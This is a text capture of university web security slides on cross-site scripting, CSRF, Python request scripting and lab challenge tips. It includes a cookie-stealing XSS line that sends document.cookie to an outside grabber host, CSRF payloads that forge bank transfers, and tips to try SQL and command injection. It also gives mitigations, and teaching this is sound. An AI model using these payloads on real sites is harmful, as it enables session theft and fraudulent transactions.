![Page 1: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/1.jpg)
WEB SECURITY WEEK 3Computer Security Group
University of Texas at Dallas
![Page 2: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/2.jpg)
Cross Site Scripting
![Page 3: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/3.jpg)
Overview
Exploits the trust a browser places in a site by running code (usually JS) in browser
Reflected: user is tricked into running some code In URL:
site.com/?msg=<script>…</script> Pasted into address bar
Stored: the malicious code is stored persistently on the compromised website Unfiltered comments SQL injections allowing user control where
not intended
![Page 4: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/4.jpg)
Payloads and Goals
Steal cookies Open a hidden IFRAME Spam advertisements Redirect to another page Click jacking Many more
![Page 5: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/5.jpg)
Example Attack
Uses jQuery <script>$.get(‘www.mysite.com/
grabber.php?c=‘ + document.cookie);</script>
A get request is made to our site, which stores the parameter c in a log file, or autopwns them. Whatever.
![Page 6: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/6.jpg)
Example 1
http://10.176.169.7/web_demo/week3/main.php
![Page 7: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/7.jpg)
Mitigation
Developers Don’t allow users to post HTML Keep an eye out for places where attackers
could modify what other peoples’ browsers render
Users Use NoScript or similar whitelisting plugin Don’t click or paste a link with JavaScript in
it
![Page 8: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/8.jpg)
Challenge
http://10.176.169.7/web_demo/week3/challenge1/main.php
![Page 9: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/9.jpg)
Cross Server Request Forgery
![Page 10: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/10.jpg)
Overview
Similar to XSS Exploits trust that servers place in
browsers It’s very difficult for a web server to
know whether a request your computer sent it was sent with your knowledge or approval
Different than XSS, but XSS is often an attack vector for CSRF
![Page 11: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/11.jpg)
Example Attack
Images<img src=“bank.com/transfer.php?to=me&amount=1000000” />
XSS$.post(‘bank.com/transfer.php’, {to: ‘me’, amount: 1000000});
![Page 12: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/12.jpg)
Mitigation
Only trust requests from your domain Use CSRF protection tokens – included in
many web frameworks Use the appropriate HTTP request, don’t
use GET for something that modifies data
Not much to do as a user
![Page 13: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/13.jpg)
Python for Web
![Page 14: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/14.jpg)
Python Web Scripts
Python is a powerful scripting language. Some web problems are very repetitious. Using libraries urllib and urllib2.
![Page 15: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/15.jpg)
Example Code
import urllib import urllib2
url = 'http://www.someserver.com/cgi-bin/register.cgi' values = {'name' : 'Michael Foord', 'location' : 'Northampton', 'language' : 'Python' }
data = urllib.urlencode(values) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read()
![Page 16: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/16.jpg)
Example 2
http://10.176.169.7/web_demo/week3/guess.php
![Page 17: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/17.jpg)
Mitigation
Captchas Lockouts after several attempts
![Page 18: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/18.jpg)
Challenge 2
http://10.176.169.7/web_demo/week3/challenge2/guess.php
![Page 19: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/19.jpg)
General Tips
![Page 20: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/20.jpg)
Look at Requests!
Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, BurpSuite, etc.
The idea is to find things we can alter The goal is to invalidate trust that the
developer put in us
![Page 21: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/21.jpg)
Inject Everything
If your data goes into a database query, try SQL injection
If you think it’s piping your input into a program, try command injection via && and the like
If it looks like it’s rendering HTML, try some JavaScript
![Page 22: WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas](https://reader030.vdocument.in/reader030/viewer/2022032803/56649e2d5503460f94b1c62f/html5/thumbnails/22.jpg)
Questions?